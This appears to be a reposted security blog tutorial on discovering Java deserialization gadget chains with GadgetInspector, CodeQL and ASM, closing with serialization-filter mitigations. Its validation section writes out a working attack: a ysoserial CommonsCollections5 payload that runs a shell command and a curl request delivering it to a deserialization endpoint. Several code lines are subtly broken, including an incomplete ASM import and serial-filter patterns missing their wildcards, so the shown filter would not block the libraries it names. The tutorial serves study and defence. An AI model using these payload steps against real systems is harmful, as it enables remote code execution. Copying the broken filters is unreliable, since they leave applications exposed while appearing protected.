Unearthing Java Deserialization Gadgets: A 2026 Approach to Finding RCE Chains + Video

Listen to this Post

Featured Image

Introduction:

Java deserialization vulnerabilities continue to be a prime vector for remote code execution (RCE) in modern applications. By chaining together specific classes—known as “gadgets”—attackers can transform a simple deserialization event into a full system compromise. As we move into 2026, the discovery of these gadgets has evolved from manual code review to automated, AI‑assisted analysis. This article provides a practical, step‑by‑step guide to finding Java deserialization gadgets using the latest tools and techniques, ensuring you can both identify and mitigate these critical flaws.

Learning Objectives:

  • Understand the structure of Java gadget chains and how they lead to RCE.
  • Master automated gadget discovery with tools like GadgetInspector and CodeQL.
  • Learn to validate and weaponize discovered chains using ysoserial and dynamic analysis.

You Should Know:

1. Anatomy of Java Gadget Chains

A gadget chain in Java deserialization typically consists of three parts: an entry point (a class that executes code during deserialization, e.g., readObject()), intermediate gadgets (classes that pass or transform data), and a sink (a dangerous method call, e.g., Runtime.exec()).

For example, the classic `CommonsCollections` chain uses `InvokerTransformer` to invoke arbitrary methods. When the object is deserialized, the chain triggers a call to Runtime.exec(). Understanding this flow is essential before diving into discovery.

2. Setting Up Your Analysis Environment

You’ll need a Linux or macOS machine with Java 11+ installed. Use Docker to isolate analysis and avoid polluting your host system.

 Install Java (Debian/Ubuntu)
sudo apt update && sudo apt install openjdk-17-jdk

Download the target application JAR (example)
wget https://example.com/vulnerable-app.jar

Set up a directory for tools
mkdir ~/gadget-lab && cd ~/gadget-lab

Install essential tools:

  • GadgetInspector (automated gadget discovery)
  • ysoserial (payload generation)
  • CodeQL (advanced static analysis)
git clone https://github.com/JackOfMostTrades/gadgetinspector.git
git clone https://github.com/frohoff/ysoserial.git
 Build ysoserial
cd ysoserial && mvn clean package -DskipTests

3. Automated Gadget Discovery with GadgetInspector

GadgetInspector scans Java bytecode to find potential gadget chains by analyzing method calls and data flow.

Step‑by‑step:

1. Run GadgetInspector against your target JAR:

cd gadgetinspector
java -jar gadgetinspector.jar --jar ../vulnerable-app.jar --printAll

2. The tool outputs a list of “passthrough” classes—those that pass objects without modification—and potential starting points.
3. Review the generated `gadget-chains.txt` file. It highlights methods that could be used in a chain.

What it does: GadgetInspector performs a taint‑like analysis, tracking where serialized data can flow and identifying calls to dangerous methods (e.g., exec(), invoke()).

4. Advanced Static Analysis Using Code Property Graphs

For deeper analysis, use CodeQL, which converts code into a queryable database.

Setup:

 Install CodeQL
wget https://github.com/github/codeql-cli-binaries/releases/latest/download/codeql-linux64.zip
unzip codeql-linux64.zip
export PATH=$PATH:~/codeql

Create a CodeQL database from your JAR:

codeql database create vulnerable-app-db --language=java --source-root=./vulnerable-app/

Write a query to find `readObject()` methods that call Runtime.exec():

import java

from MethodAccess ma, Method m
where m.hasName("exec") and
m.getDeclaringType().hasQualifiedName("java.lang", "Runtime") and
ma.getEnclosingCallable().hasName("readObject")
select ma

This query reveals if any `readObject` directly calls exec(). More complex queries can trace data flow from `readObject` to a sink.

5. Dynamic Analysis and Validation

Once you have potential gadgets, validate them using ysoserial.

Step‑by‑step:

1. Build a payload with ysoserial:

java -jar ysoserial-all.jar CommonsCollections5 'touch /tmp/pwned' > payload.bin

2. Send the payload to a vulnerable endpoint (e.g., using Burp Suite Repeater or curl):

curl -X POST -H "Content-Type: application/x-java-serialized-object" --data-binary @payload.bin http://target.com/deserialize

3. Monitor for the file creation (/tmp/pwned) to confirm RCE.

If the target uses custom classes, you may need to build a custom gadget chain. Use GadgetInspector’s output to chain multiple classes manually.

6. Writing Custom Gadget Scanners

For proprietary libraries, you might need a tailored scanner using bytecode manipulation libraries like ASM.

Example: Scan all classes in a JAR for methods that call `invoke()` on `Method` objects:

import org.objectweb.asm.;

public class InvokeScanner extends ClassVisitor {
public static void main(String[] args) throws IOException {
JarFile jar = new JarFile(new File("target.jar"));
Enumeration<JarEntry> entries = jar.entries();
while (entries.hasMoreElements()) {
JarEntry entry = entries.nextElement();
if (entry.getName().endsWith(".class")) {
ClassReader cr = new ClassReader(jar.getInputStream(entry));
cr.accept(new ClassVisitor(Opcodes.ASM9) {
@Override
public MethodVisitor visitMethod(int access, String name, String desc,
String signature, String[] exceptions) {
return new MethodVisitor(Opcodes.ASM9) {
@Override
public void visitMethodInsn(int opcode, String owner, String name,
String desc, boolean itf) {
if (opcode == Opcodes.INVOKEVIRTUAL && name.equals("invoke") &&
owner.equals("java/lang/reflect/Method")) {
System.out.println("Found invoke in method: " + name);
}
}
};
}
}, 0);
}
}
}
}

Compile and run this scanner to identify potential gadget sinks.

7. Mitigation Strategies and Secure Coding

Prevent deserialization attacks by implementing object filters. Java 9+ supports JEP 290/415:

 Enable a global filter to block dangerous classes
java -Djdk.serialFilter="!org.apache.commons.collections.;!java.lang.Runtime;maxdepth=10" -jar app.jar

In code, use `ObjectInputFilter` to reject classes:

ObjectInputStream ois = new ObjectInputStream(inputStream);
ois.setObjectInputFilter(info -> {
if (info.serialClass() != null && 
info.serialClass().getName().startsWith("org.apache.commons.collections")) {
return ObjectInputFilter.Status.REJECTED;
}
return ObjectInputFilter.Status.ALLOWED;
});

Regularly update dependencies and use tools like OWASP Dependency Check to identify known vulnerable libraries.

What Undercode Say:

  • Key Takeaway 1: Automated tools accelerate gadget discovery but cannot replace human intuition—complex chains often require manual chaining of multiple classes.
  • Key Takeaway 2: In 2026, the integration of static analysis with runtime monitoring (e.g., using Java agents) provides a more complete picture of gadget reachability.
  • Key Takeaway 3: Defense in depth—combining serialization filters with minimal classpath exposure—remains the most effective mitigation.

The field is shifting toward AI‑assisted code analysis, where models can predict gadget chains from large codebases, but understanding the bytecode level is still crucial. Regularly auditing your own code for gadget-like patterns will keep you ahead of attackers.

Prediction:

As microservices and serverless architectures become dominant, Java deserialization attacks will target inter‑service communication protocols (e.g., Kryo, Hessian) and message queues. Future gadget discovery tools will leverage graph neural networks to automatically trace data flows across distributed services, and we may see the emergence of “gadget‑as‑a‑service” platforms that share chain intelligence among defenders. The arms race between gadget hunters and filter developers will intensify, with filters becoming more granular and adaptive.

▶️ Related Video (86% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Jmetayer Trouver – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky